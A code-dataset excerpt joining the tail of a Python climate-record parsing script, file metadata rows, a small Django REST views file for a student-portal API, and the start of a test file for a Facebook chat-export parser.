",x,calendar.month_abbr[metkeys[x][y].month],metkeys[x][y].year)) else: if "ascending" not in kw or "ascending" in kw and kw["ascending"] == False or "ascending" in kw and kw["ascending"] == True and clmt[metkeys[x][y].year][metkeys[x][y].month]["recordqty"] > excludemonth: appendr = True if attribute == "prcp": print("{:>2}{} {:6.2f} - {} {}".format(r if r not in printed else " ","." if r not in printed else " ",x,calendar.month_abbr[metkeys[x][y].month],metkeys[x][y].year)) elif attribute in ["prcpDAYS","snowDAYS","snwdDAYS"]: print("{:>2}{} {:2} - {} {}".format(r if r not in printed else " ","." if r not in printed else " ",x,calendar.month_abbr[metkeys[x][y].month],metkeys[x][y].year)) else: print("{:>2}{} {:6.1f} - {} {}".format(r if r not in printed else " ","." if r not in printed else " ",x,calendar.month_abbr[metkeys[x][y].month],metkeys[x][y].year)) else: if attribute == "tavg": if "ascending" not in kw or "ascending" in kw and kw["ascending"] == False or "ascending" in kw and kw["ascending"] == True and clmt[metkeys[x][y].year][metkeys[x][y].month]["recordqty"] > excludemonth * 2: appendr = True print("{:>2}{} {:6.1f} - {} {}".format(r if r not in printed else " ","." if r not in printed else " ",x,calendar.month_abbr[metkeys[x][y].month],metkeys[x][y].year)) else: if "ascending" not in kw or "ascending" in kw and kw["ascending"] == False or "ascending" in kw and kw["ascending"] == True and clmt[metkeys[x][y].year][metkeys[x][y].month]["recordqty"] > excludemonth: appendr = True if attribute == "prcp": print("{:>2}{} {:6.2f} - {} {}".format(r if r not in printed else " ","." if r not in printed else " ",x,calendar.month_abbr[metkeys[x][y].month],metkeys[x][y].year)) elif attribute in ["prcpDAYS","snowDAYS","snwdDAYS"]: print("{:>2}{} {:2} - {} {}".format(r if r not in printed else " ","." if r not in printed else " ",x,calendar.month_abbr[metkeys[x][y].month],metkeys[x][y].year)) else: print("{:>2}{} {:6.1f} - {} {}".format(r if r not in printed else " ","." if r not in printed else " ",x,calendar.month_abbr[metkeys[x][y].month],metkeys[x][y].year)) if r not in printed and appendr == True: printed.append(r) appendr = False else: # Assesses data from the entire record for x in keys: r += 1 if r > qty: break for y in range(len(clmt_vars_months[attribute][x])): if attribute == "tavg": if "ascending" not in kw or ("ascending" in kw and kw["ascending"] == False) or ("ascending" in kw and kw["ascending"] == True and clmt[clmt_vars_months[attribute][x][y].year][clmt_vars_months[attribute][x][y].month]["recordqty"] > excludemonth * 2): appendr = True print("{:>2}{} {:6.1f} - {} {}".format(r if r not in printed else " ","." if r not in printed else " ",x,calendar.month_abbr[clmt_vars_months[attribute][x][y].month],clmt_vars_months[attribute][x][y].year)) else: if "ascending" not in kw or ("ascending" in kw and kw["ascending"] == False) or ("ascending" in kw and kw["ascending"] == True and clmt[clmt_vars_months[attribute][x][y].year][clmt_vars_months[attribute][x][y].month]["recordqty"] > excludemonth): appendr = True if attribute == "prcp": print("{:>2}{} {:6.2f} - {} {}".format(r if r not in printed else " ","." if r not in printed else " ",x,calendar.month_abbr[clmt_vars_months[attribute][x][y].month],clmt_vars_months[attribute][x][y].year)) elif attribute in ["prcpDAYS","snowDAYS","snwdDAYS"]: print("{:>2}{} {:2} - {} {}".format(r if r not in printed else " ","." if r not in printed else " ",x,calendar.month_abbr[clmt_vars_months[attribute][x][y].month],clmt_vars_months[attribute][x][y].year)) else: print("{:>2}{} {:6.1f} - {} {}".format(r if r not in printed else " ","." if r not in printed else " ",x,calendar.month_abbr[clmt_vars_months[attribute][x][y].month],clmt_vars_months[attribute][x][y].year)) if r not in printed and appendr == True: printed.append(r) appendr = False #------------------------------------------- print("") def valueSearch(stat_type,op,value,**kwargs): """Quick function to designate a value, and the days or months where the attribute of interest exceeded, equalled, or was less than the passed value valueSearch("attribute","operator",value,**{sortmonth=False}) * "attribute" must be in ["prcp","snow","snwd","tavg","tmax","tmin"] (other values are accepted, but these are what are assessed * "operator" must be in ["<=","<","==","!=",">",">="] * value must be an integer or a float OPT **kwarg: sortmonth = True --> If set to true, it will do a value search based on monthly data instead of daily (no snwd data is available for months though) EXAMPLE: valueSearch("prcp",">=",5) --> returns a list of all days on record where 5+ inches of rain fell """ #operator=">", year=1984, month=12,season="winter" # v, args[rain,prcp,snow,temp,avgtemp,tmax,avgtmax,tmin,avgtmin], kwargs[condition,year,metyear,season,month] valid_yrs = sorted([x for x in clmt.keys() if type(x) == int]) valid_metyrs = sorted([x for x in metclmt.keys() if type(x) == int]) # ERROR HANDLING if stat_type.lower() not in ["rain","prcp","precip","snow","snwd","temp","temps","temperature","temperatures","avgtemp","tavg","tempavglist","tmax","hi","high","tmin","lo","low"]: return print("OOPS! {} is not a supported stat category. Try again!".format(stat_type)) if op not in ["<","<=","==",">",">="]: return print("OOPS! '{}' is not a supported operator. Try again!".format(op)) if type(value) not in [int,float]: return print("OOPS! Only integers or floats are supported for value intake") # Format passed variables stat_type = stat_type.lower() # Convert to lower-case for homogeniety if stat_type in ["rain","prcp","precip"]: stat_type = "prcp" if stat_type in ["snow"]: stat_type = "snow" if stat_type in ["snwd"]: stat_type = "snwd" if stat_type in ["avgtemp","tavg","tempavglist","temp","temps","temperature","temperatures"]: stat_type = "tavg" if stat_type in ["tmax","hi","high"]: stat_type = "tmax" if stat_type in ["tmin","lo","low"]: stat_type = "tmin" if "sortmonth" in kwargs and kwargs["sortmonth"] == True: CLMTDICT = clmt_vars_months stype = "month" else: # Just sorting indv days CLMTDICT = clmt_vars_days stype = "day" results = [] for VAR in CLMTDICT[stat_type]: for DAY in CLMTDICT[stat_type][VAR]: if op == "<": if stype == "month": if VAR < value and clmt[DAY.year][DAY.month]["recordqty"] > excludemonth: results.append(DAY) else: if VAR < value: results.append(DAY) elif op == "<=": if stype == "month": if VAR <= value and clmt[DAY.year][DAY.month]["recordqty"] > excludemonth: results.append(DAY) else: if VAR <= value: results.append(DAY) elif op == "!=": if VAR != value: results.append(DAY) elif op == "==": if VAR == value: results.append(DAY) elif op == ">=": if VAR >= value: results.append(DAY) elif op == ">": if VAR > value: results.append(DAY) results.sort() if "sortmonth" in kwargs and kwargs["sortmonth"] == True: if stat_type == "prcp": print("Total months where the Total Rainfall {} {}: {}".format(op,value,len(results))) elif stat_type == "snow": print("Total months where the Total Snowfall {} {}: {}".format(op,value,len(results))) elif stat_type in ["tmax","tmin"]: print("Total months where the Average {} {} {}: {}".format(stat_type.upper(),op,value,len(results))) elif stat_type == "tavg": print("Total months where the Average Temperature {} {}: {}".format(op,value,len(results))) else: return print("*** valueSearch does not report on monthly variations of {} ***".format(stat_type)) if len(results) <= 50: stillprint = True else: stillpr = input("print results? ('y'/'n'): ") if stillpr == "y": stillprint = True else: stillprint = False if stillprint == True: if stat_type == "prcp": for x in results: print("{:6.2f}: {} {}".format(round(sum(clmt[x.year][x.month]["prcp"]),2),calendar.month_abbr[x.month],x.year)) if stat_type == "snow": for x in results: print("{:5.1f}: {} {}".format(round(sum(clmt[x.year][x.month]["snow"]),1),calendar.month_abbr[x.month],x.year)) #if stat_type == "snwd": #for x in results: print("{:5.1f}: {} {}".format(round(sum(clmt[x.year][x.month]["snwd"]),1),calendar.month_abbr[x.month],x.year)) if stat_type == "tavg": for x in results: print("{:5.1f}: {} {}".format(round(mean(clmt[x.year][x.month]["tempAVGlist"]),1),calendar.month_abbr[x.month],x.year)) if stat_type == "tmax": for x in results: print("{:5.1f}: {} {}".format(round(mean(clmt[x.year][x.month]["tmax"]),1),calendar.month_abbr[x.month],x.year)) if stat_type == "tmin": for x in results: print("{:5.1f}: {} {}".format(round(mean(clmt[x.year][x.month]["tmin"]),1),calendar.month_abbr[x.month],x.year)) else: # Just assessing individual days print("Total days where '{}' {} {}: {}".format(stat_type,op,value,len(results))) if len(results) <= 50: stillprint = True else: stillpr = input("print results? ('y'/'n'): ") if stillpr == "y": stillprint = True else: stillprint = False if stillprint == True: if stat_type == "prcp": for x in results: print("{:>5.2f}: {}".format(float(clmt[x.year][x.month][x.day].prcp),x)) if stat_type == "snow": for x in results: print("{:>5.1f}: {}".format(float(clmt[x.year][x.month][x.day].snow),x)) if stat_type == "snwd": for x in results: print("{:>5.1f}: {}".format(float(clmt[x.year][x.month][x.day].snwd),x)) if stat_type == "tmax": for x in results: print("{:>3}: {}".format(clmt[x.year][x.month][x.day].tmax,x)) if stat_type == "tmin": for x in results: print("{:>3}: {}".format(clmt[x.year][x.month][x.day].tmin,x)) print("") def corrections(): """Activates correction mode""" print("CORRECTIONS MODE ACTIVATED - {}".format(clmt["station_name"])) print("------------------------------------------------") print("* Input a comma-separated list of the Year, Month, Date, Attribute, and new reading") print("* Ex: INPUT CORRECTION: 1899,1,30,\"prcp\",2.02") print("* When finished, type DONE and press enter") fix = [] while True: inp = input("INPUT CORRECTION: ").split(",") if inp[0].upper() == "DONE" or inp[0] == "": break elif len(inp) != 5: print("* not enough data given. Try again *") elif any(x.isdigit() == False for x in inp[0:3]): print("* Dates entered must be numeric. Try again.") elif inp[3].strip('"') not in ["prcp","snow","snwd","tmax","tmin"]: print("* Invalid Attr. Valid Attributes: '{}','{}','{}','{}'".format("prcp","snow","snwd","tmax","tmin")) else: y = int(inp[0]) m = int(inp[1]) d = int(inp[2]) if y not in clmt or m not in clmt[y] or d not in clmt[y][m]: print("* No valid entry for {}-{}-{} exists. Try again".format(int(inp[0]),int(inp[1]),int(inp[2]))) else: try: if inp[3].strip('"') == "prcp": testvalue = round(float(inp[4]),2) if clmt[int(inp[0])][int(inp[1])][int(inp[2])].prcpQ == "": print("HEADS UP! {} already had no PRCP quality flag".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr)) clmt[int(inp[0])][int(inp[1])][int(inp[2])].prcp = inp[4] clmt[int(inp[0])][int(inp[1])][int(inp[2])].prcpQ = "" fix.append("{},{},,,,".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr,inp[4])) print(" Amendment for {} PRCP successful: {}".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr,inp[4])) if inp[3].strip('"') == "snow": testvalue = round(float(inp[4]),1) if clmt[int(inp[0])][int(inp[1])][int(inp[2])].snowQ == "": print("HEADS UP! {} already had no SNOW quality flag".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr)) clmt[int(inp[0])][int(inp[1])][int(inp[2])].snow = inp[4] clmt[int(inp[0])][int(inp[1])][int(inp[2])].snowQ = "" fix.append("{},,{},,,".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr,inp[4])) print(" Amendment for {} SNOW successful: {}".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr,inp[4])) if inp[3].strip('"') == "snwd": testvalue = round(float(inp[4]),1) if clmt[int(inp[0])][int(inp[1])][int(inp[2])].snwdQ == "": print("HEADS UP! {} already had no SNWD quality flag".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr)) clmt[int(inp[0])][int(inp[1])][int(inp[2])].snwd = inp[4] clmt[int(inp[0])][int(inp[1])][int(inp[2])].snwdQ = "" fix.append("{},,,{},,".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr,inp[4])) print(" Amendment for {} SNWD successful: {}".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr,inp[4])) if inp[3].strip('"') == "tmax": testvalue = int(inp[4]) if clmt[int(inp[0])][int(inp[1])][int(inp[2])].tmaxQ == "": print("HEADS UP! {} already had no TMAX quality flag".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr)) clmt[int(inp[0])][int(inp[1])][int(inp[2])].tmax = inp[4] clmt[int(inp[0])][int(inp[1])][int(inp[2])].tmaxQ = "" fix.append("{},,,,{},".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr,inp[4])) print(" Amendment for {} TMAX successful: {}".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr,inp[4])) if inp[3].strip('"') == "tmin": testvalue = int(inp[4]) if clmt[int(inp[0])][int(inp[1])][int(inp[2])].tminQ == "": print("HEADS UP! {} already had no TMIN quality flag".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr)) clmt[int(inp[0])][int(inp[1])][int(inp[2])].tmin = inp[4] clmt[int(inp[0])][int(inp[1])][int(inp[2])].tminQ = "" fix.append("{},,,,,{}".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr,inp[4])) print(" Amendment for {} TMIN successful: {}".format(clmt[int(inp[0])][int(inp[1])][int(inp[2])].daystr,inp[4])) except: print("Hmm. Double check your input value. Try again") if len(fix) > 0: with open("APPENDED_" + FILE,"w") as f: f.write('"STATION","NAME","LATITUDE","LONGITUDE","ELEVATION","DATE","PRCP","PRCP_ATTRIBUTES","SNOW","SNOW_ATTRIBUTES","SNWD","SNWD_ATTRIBUTES","TMAX","TMAX_ATTRIBUTES","TMIN","TMIN_ATTRIBUTES"\n') for yr in [YR for YR in clmt if type(YR) == int]: for mo in [MO for MO in clmt[yr] if type(MO) == int]: for dy in [DY for DY in clmt[yr][mo] if type(DY) == int]: f.write('"{}",'.format(clmt[yr][mo][dy].stationid)) f.write('"{}",'.format(clmt[yr][mo][dy].station_name)) f.write('"{}",'.format(clmt[yr][mo][dy].station_lat)) f.write('"{}",'.format(clmt[yr][mo][dy].station_lon)) f.write('"{}",'.format(clmt[yr][mo][dy].station_elev)) f.write('"{}",'.format(clmt[yr][mo][dy].daystr)) f.write('"{}",'.format(clmt[yr][mo][dy].prcp)) f.write('"{},{},{},{}",'.format(clmt[yr][mo][dy].prcpM,clmt[yr][mo][dy].prcpQ,clmt[yr][mo][dy].prcpS,clmt[yr][mo][dy].prcpT)) f.write('"{}",'.format(clmt[yr][mo][dy].snow)) f.write('"{},{},{},{}",'.format(clmt[yr][mo][dy].snowM,clmt[yr][mo][dy].snowQ,clmt[yr][mo][dy].snowS,clmt[yr][mo][dy].snowT)) f.write('"{}",'.format(clmt[yr][mo][dy].snwd)) f.write('"{},{},{},{}",'.format(clmt[yr][mo][dy].snwdM,clmt[yr][mo][dy].snwdQ,clmt[yr][mo][dy].snwdS,clmt[yr][mo][dy].snwdT)) f.write('"{}",'.format(clmt[yr][mo][dy].tmax)) f.write('"{},{},{},{}",'.format(clmt[yr][mo][dy].tmaxM,clmt[yr][mo][dy].tmaxQ,clmt[yr][mo][dy].tmaxS,clmt[yr][mo][dy].tmaxT)) f.write('"{}",'.format(clmt[yr][mo][dy].tmin)) f.write('"{},{},{},{}"\n'.format(clmt[yr][mo][dy].tminM,clmt[yr][mo][dy].tminQ,clmt[yr][mo][dy].tminS,clmt[yr][mo][dy].tminT)) print("Output of '{}' finished!".format("AMENDED_" + FILE)) else: return print("::: NO VALUES CHANGED :::") if len(fix) > 0: timenow = datetime.datetime.now() timestr = "{:%Y%m%d_%H%M}".format(timenow) with open("CHG_" + timestr + "_" + FILE,"w") as f: f.write("{},{},{},{},{},{}\n".format("DAY","PRCP","SNOW","SNWD","TMAX","TMIN")) for each in fix: f.write(each); f.write("\n") print("Output of '{}' finished!".format("CHG_" + timestr + "_" + FILE)) def clmthelp(): """An extensive list within the script of available functions to the user """ # print("* PLEASE SEE README.md FOR A FULL BREAKDOWN OF PROGRAM'S CAPABILITIES *") for x in wrap("* TO START: -When you start, the clmtmenu() function automatically runs. If canceled, simply run the function again. it displays all csv's in the folder",width=78,subsequent_indent=" "): print(x) print(" -takes optional keyword argument <city>") for x in wrap("CLIMATOLOGY VARIABLES: At the end of the script, you'll see two variables: climatology and increment. These are strictly used in the Report functions. The former is to allow the user to modify the length of climatologies (so if you want to assess them at 10, 20, or even 50-yr); the latter controls the frequency of the assessment",width=78,subsequent_indent=" "): print(x) print(" climatology = 30 # Default Climatology Length in reports") print(" increment = 5 # Default running-mean increment") for x in wrap("RECORD THRESHOLDS: At the end of the script, you'll find record thresholds. These are controls employed whilst running report/rank functions to prevent partial years/months/weeks from polluting the overall data if it would affect it",width=78,subsequent_indent=" "): print(x) print(" DEFAULT VALUES (can be modified before or after compiling the data):") print(" excludeyear = 300 # Exclude years from ranking/reports if ") print(" year recordqty <= to this threshold") print(" excludemonth = 20 # Exclude months from ranking/reports if") print(" month recordqty <= to this threshold") print(" excludeweek = 4 # Exclude weeks from ranking/reports if") print(" week recordqty <= to this threshold") print(" excludecustom = .75 # Exclude custom periods from ranking or") print(" reports if week recordqty <= 75% of a") print(" threshold") print("DAILY SUMMARIES:") print(" -- daySummary(y1,m1,d1,*[y2,m2,d2]) :: Dumps a list of day-by-day data in a given range of dates") print("ERRORS OVERVIEW:") print(" -- Run qflagCheck() to get the code and definition for various quality flags in the record") print(" -- Run errorStats() to get get a report on errors that might be worth veryfying the data for.") print(" * this function will report on every error unless it is a temperature with an 'I' flag.") print(" - These can be quite numerous. So won't be included in the report") print(" * by default, data with any type of quality flag will NOT be included in stats/reports") print(" * User can change these settings by one of two ways:") print(" - Find where the 'ignoreflags' list is in the script, and add or take away from the list") print(" - On the fly, with the command ignoreflags.append('<flag>') or ignoreflags.remove('<flag>')") print(" * using corrections(), It is possible to verify the data and remove the quality flag so it will be included") print(" - this process amends the data and outputs a new file; reload using clmtAnalyze() for best results") print(" * Please see README.md to read more about this process") print("BUILT-IN FUNCTIONS: (these won't work until you run the clmtAnalyze function)") print(" -- dayStats(year,month,day) :: Returns a basic report for the specified day") print(" -- weekStats(year,month,day) :: Returns a basic weekly report; the included day will be the ") print(" center of the week") print(" -- monthStats(year,month) :: Returns a basic report for the specified month") print(" -- yearStats(year) :: Returns a basic report for the specified year") print(" -- metYearStats(year) :: Returns a basic report for the specified meteorological year") print(" -- seasonStats(year,season) :: Returns a basic report for the specified meteorological ") print(" season ('spring','summer','fall','winter')") print(" -- customStats(y1,m1,d1,*y2,*m2,*d2)") print(" Climatology Functions :: Detailed stats based on 30-yr climatologies incremented by") print(" 5 years and enables basic climatological tendency analysis. These defaults can change as needed.") print(" see README for more details or use the help function on one of the variables") print(" -- dayReport(month,day) :: Returns detailed statistics and climatology for all specified") print(" days in the record") print(" -- weekReport(month,day) :: Returns detailed statistics and climatology for determined 7-day") print(" period and the included day will be the center of the week") print(" -- monthReport(month) :: Returns detailed statistics and climatology for the specified month") print(" -- yearReport() :: NOTHING is passed to this function. It returns detailed statistics based ") print(" on data for all years") print(" -- metYearReport() :: NOTHING is passed to this function. It returns detailed statistics based ") print(" on data for all meteorological years") print(" -- seasonReport(season) :: Returns detailed statistics and climatology for the specified season") print(" -- customReport(M1,D1,*[M2,D2]) :: Returns detailed statistics and climatology for the specified,") print(" custom period of time. The ending month and date are optional") print(" Rank/Record Functions") print(" -- dayRank(month,day,howmany) :: Prints daily records from the climate data.") print(" -- weekRank(month,day,howmany) :: Prints records based on a week's period, centered on the ") print(" day entered (3 days before; 3 after)") print(" -- monthRank(month,'<temps>|<rain>',howmany) :: Prints month-based records for the given month") print(" -- yearRank('<temps>|<rain>',howmany) :: Prints yearly-based records for the entire record (Jan-Dec)") print(" -- metYearRank('<temps>|<rain>',howmany) :: Prints meteorological-yearly-based records for the ") print(" entire record (Jan-Dec)") print(" -- seasonRank(season,'<temps>|<rain>',howmany) :: Prints season-based records for the inquired season") print(" -- customRank(attribute,quantity,M1,D1,*[M2,D2]) :: Prints ranked-records for the inquired period of time") print(" The ending date is optional. This is a good function for proxy of a YTD function") print(" -- allDayRank('attribute',quantity,**{season,year,month,ascending}) :: compares all daily data on record.") print(" optional temporal keyword arguments accepted") print(" -- allMonthRank(attribute,quantity,**{season,ascending}) :: compares all monthly data on record to one") print(" another. Optional keyword arguments of <season> or <ascending=True> are accepted") def clmtmenu(): """Enables the user to select which csv file (as such, which city) that they'd like to load/mount into the program; automatically ran at initilization of the script, but can be ran at anytime; replaces the csvFileList() function. clmtmenu() """ tempcsvlist = os.listdir() csvs_in_dir = [x for x in tempcsvlist if x[len(x)-3:] == "csv" and x[0:9] not in ["dayReport","weekRepor","monthRepo","yearRepor","seasonRep","metYearRe","customRep"]] selection = False # Will cause the function to wait until an accepted answer is input print("**********************************************************") print(" CLIMATE PARSER (clmt-parser.py) v2.9x") print(" by K. Gentry (ksgwxfan)") print("**********************************************************") print("- Make selection and press <ENTER>; type-in cancel to exit function") print("- Run this function again by entering clmtmenu()") print("- OPTIONAL: enter in a custom city name (useful if the file has") print(" multiple stations). Just separate by a comma.") print(" Example --> Enter Selection: 2, CITY") print("-----------------------------------------------------------") for each in csvs_in_dir: print("{:>3}. {}".format(csvs_in_dir.index(each) + 1,each)) print("-----------------------------------------------------------") while selection == False: # only jumps out of while-loop if answer is valids userselection = input("Enter Selection: ") userselection = userselection.split(",") if userselection[0].isnumeric() and int(userselection[0]) > 0 and int(userselection[0]) <= len(csvs_in_dir) or userselection[0].lower() == "cancel": selection = True else: print("OOPS! Invalid selection. Try again!") if len(userselection) >= 2: citystr = userselection[1].strip(" ") for x in range(2,len(userselection)): citystr = citystr + ", " + userselection[x].strip(" ") if userselection[0].lower() != "cancel": if len(userselection) == 1: clmtAnalyze(csvs_in_dir[int(userselection[0])-1]) else: #citystr = userselection[1].strip(" ") + ", " + userselection[2].strip(" ") clmtAnalyze(csvs_in_dir[int(userselection[0])-1],city=citystr) # MAIN PROGRAM -------------------------------------------------------------- clmt = {} metclmt = {} clmt_vars_days = {"prcp":{},"snow":{},"snwd":{},"tavg":{},"tmax":{},"tmin":{}} clmt_vars_months = {"prcp":{},"prcpDAYS":{},"snow":{},"snowDAYS":{},"snwd":{},"snwdDAYS":{},"tavg":{},"tmax":{},"tmin":{}} station_ids = [] FILE = None # Threshold Quantities ignoreflags = [""] # If there are Quality Flags that you wish to ignore, place them here (or append upon starting; see README) excludeyear = 300 # Exclude years from ranking/reports if year recordqty <= to this threshold excludeseason = 70 # Exclude season from rankings/reports if season recordqty <= to this threshold excludemonth = 20 # Exclude months from ranking/reports if month recordqty <= to this threshold excludeweek = 4 # Exclude weeks from ranking/reports if week recordqty <= to this threshold excludecustom = .75 # Excludes custom periods if recordqty isn't at least this percentage of threshold # tempAVGlist Threshold Quantities (DO NOT TOUCH!!! these are handled from above variables) excludeyear_tavg = excludeyear * 2 excludeseason_tavg = excludeseason * 2 excludemonth_tavg = excludemonth * 2 excludeweek_tavg = excludeweek * 2 clmtmenu() # li = sorted([{"year":y,"month":m,"snwdDAYS":clmt[y][m]["snwdDAYS"]} for y in clmt if type(y) == int for m in clmt[y] if type(m) == int and clmt[y][m]["snwdDAYS"] > 0],key=lambda x:x["snwdDAYS"],reverse=True)
79.613121
409
0.539487
80,256
578,867
3.821322
0.015164
0.02752
0.019682
0.014129
0.892303
0.864033
0.835016
0.790703
0.74071
0.690848
0
0.035555
0.234651
578,867
7,271
410
79.613121
0.656129
0.072291
0
0.459629
0
0.021273
0.200796
0.008703
0
0
0
0
0
1
0.008058
false
0.008703
0.001773
0
0.014021
0.1639
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
1af65582e33d661350f89fb423af1d29e91ecbdb
1,487
py
Python
main/views.py
nishantc7/iterapi-web
515e43a45b1459baa5a05dcb5446ed1524d37998
[ "MIT" ]
4
2020-05-05T14:12:42.000Z
2020-06-13T11:15:52.000Z
main/views.py
nishantc7/iterapi-web
515e43a45b1459baa5a05dcb5446ed1524d37998
[ "MIT" ]
6
2020-05-05T13:19:48.000Z
2021-09-22T18:58:20.000Z
main/views.py
nishantc7/iterapi-web
515e43a45b1459baa5a05dcb5446ed1524d37998
[ "MIT" ]
1
2020-06-13T11:16:36.000Z
2020-06-13T11:16:36.000Z
from rest_framework import generics from rest_framework.response import Response from iterapi import Student from rest_framework.parsers import JSONParser from main.serializer import UserSerializer class MainView(generics.CreateAPIView): parser_classes = [JSONParser] serializer_class = UserSerializer def post(self, request): user_id = request.data['user_id'] password = request.data['password'] st = Student(user_id, password) return Response(st.getAttendance()) class ResultView(generics.CreateAPIView): parser_classes = [JSONParser] serializer_class = UserSerializer def post(self, request): user_id = request.data['user_id'] password = request.data['password'] sem = request.data['sem'] st = Student(user_id, password) return Response(st.getDetailedResult(sem)) class InfoView(generics.CreateAPIView): parser_classes = [JSONParser] serializer_class = UserSerializer def post(self, request): user_id = request.data['user_id'] password = request.data['password'] st = Student(user_id, password) return Response(st.getInfo()) class CgpaView(generics.CreateAPIView): parser_classes = [JSONParser] serializer_class = UserSerializer def post(self, request): user_id = request.data['user_id'] password = request.data['password'] st = Student(user_id, password) return Response(st.getResult())
29.156863
50
0.696032
163
1,487
6.208589
0.220859
0.071146
0.110672
0.134387
0.711462
0.711462
0.711462
0.711462
0.672925
0.672925
0
0
0.209146
1,487
50
51
29.74
0.860544
0
0
0.631579
0
0
0.042367
0
0
0
0
0
0
1
0.105263
false
0.210526
0.131579
0
0.657895
0
0
0
0
null
0
0
0
0
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
6
2128761b912dafc74f58f16adbf28832a7b51fe6
12,064
py
Python
test/test_3_rules.py
nick-killeen/demuxfb
9c9a89c3b3116add018f98ef9e11ae335395692a
[ "MIT" ]
null
null
null
test/test_3_rules.py
nick-killeen/demuxfb
9c9a89c3b3116add018f98ef9e11ae335395692a
[ "MIT" ]
null
null
null
test/test_3_rules.py
nick-killeen/demuxfb
9c9a89c3b3116add018f98ef9e11ae335395692a
[ "MIT" ]
null
null
null
""" Test a subset of chat construction rules against *my* current expectations. These should not be considered formal tests. They are just an artifact of exploratory sanity testing, distrubted only for completeness. There is no formal spec. This file should not be maintained. Throw it out when the Facebook exporter updates """ import sys from .helpers import SpoofChatFeed sys.path.append('src/') import demuxfb # nopep8 pylint: disable=wrong-import-position def test_match_media_message(): chat_feed = SpoofChatFeed() chat_feed.push(photos=[{'uri': 'messages/inbox/convo/photos/blah.png', 'creation_timestamp': 1000}]) chat_feed.push(content='What do these mean?', photos=[{'uri': 'messages/inbox/convo/photos/blah.png', 'creation_timestamp': 1000}, {'uri': 'messages/inbox/convo/photos/blah1.png', 'creation_timestamp': 2000}]) chat_feed.push(gifs=[{'uri': 'messages/inbox/convo/gifs/blah.gif'}]) chat_feed.push(audio_files=[{'uri': 'messages/inbox/convo/audio/blah.mp4', 'creation_timestamp': 1000}]) chat_feed.push(videos=[{'uri': 'messages/inbox/convo/videos/blah.mp4', 'creation_timestamp': 1000, 'thumbnail': { 'uri': 'messages/inbox/convo//videos/thumbnails' '/blarg.jpg' }}]) chat_feed.push(files=[{'uri': 'messages/inbox/convo/videos/blah.mp4', 'creation_timestamp': 1000}]) chat_feed.push(sticker={'uri': 'messages/stickers_used/blah.png'}) chat = demuxfb.build_chat(chat_feed, 'John Smith') messages = chat.messages message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert message.content is None assert len(message.photos) == 1 assert len(message.gifs) == 0 assert len(message.audio_files) == 0 assert len(message.videos) == 0 assert len(message.attachment_files) == 0 assert len(message.stickers) == 0 message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert message.content == 'What do these mean?' assert len(message.photos) == 2 message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert len(message.photos) == 0 assert len(message.gifs) == 1 message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert len(message.audio_files) == 1 message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert len(message.videos) == 1 message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert len(message.attachment_files) == 1 message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert len(message.stickers) == 1 def test_match_empty_message(): chat_feed = SpoofChatFeed() chat_feed.push() chat = demuxfb.build_chat(chat_feed, 'John Smith') messages = chat.messages message = messages.pop(0) assert isinstance(message, demuxfb.message.EmptyMessage) def test_call_messages(): chat_feed = SpoofChatFeed() chat_feed.push(content='John started a video chat.') chat_feed.push(content='John joined the video chat.') chat_feed.push(content='The video chat ended.') chat_feed.push(content='John started a call.') chat_feed.push(content='John joined the call.') chat_feed.push(content='The call ended.') chat_feed.push(content='John started a call.') chat_feed.push(content='John joined the call.') chat_feed.push(content='The call ended.') chat = demuxfb.build_chat(chat_feed, 'Jake Smith') messages = chat.messages message = messages.pop(0) assert isinstance(message, demuxfb.message.CallStartMessage) assert message.call_type == demuxfb.message.CallType.VIDEO message = messages.pop(0) assert isinstance(message, demuxfb.message.CallJoinMessage) assert message.call_type == demuxfb.message.CallType.VIDEO message = messages.pop(0) assert isinstance(message, demuxfb.message.CallEndMessage) assert message.call_type == demuxfb.message.CallType.VIDEO message = messages.pop(0) assert isinstance(message, demuxfb.message.CallStartMessage) assert message.call_type == demuxfb.message.CallType.AUDIO message = messages.pop(0) assert isinstance(message, demuxfb.message.CallJoinMessage) assert message.call_type == demuxfb.message.CallType.AUDIO message = messages.pop(0) assert isinstance(message, demuxfb.message.CallEndMessage) assert message.call_type == demuxfb.message.CallType.AUDIO def test_match_nickname_change_message(): chat_feed = SpoofChatFeed() chat_feed.push(sender_name='Joseph', content='Joseph cleared his own nickname.') chat_feed.push(sender_name='Joseph', content='Joseph cleared your nickname.') chat_feed.push(sender_name='Joseph', content='Joseph cleared the nickname for Jacob.') chat_feed.push(sender_name='Joseph', content='Joseph set the nickname for Jacob to Jake.') chat_feed.push(sender_name='Joseph', content='Joseph set your nickname to John.') chat_feed.push(sender_name='Joseph', content='Joseph set their own nickname to Joe.') chat_feed.push(content='You cleared your nickname.') chat_feed.push(content='You cleared the nickname for Joseph.') chat_feed.push(content='You set the nickname for Joseph to Joe.') chat_feed.push(content='You set your nickname to John.') chat = demuxfb.build_chat(chat_feed, 'John Smith') messages = chat.messages joseph = chat.get_participant('Joseph') jacob = chat.get_participant('Jacob') message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert 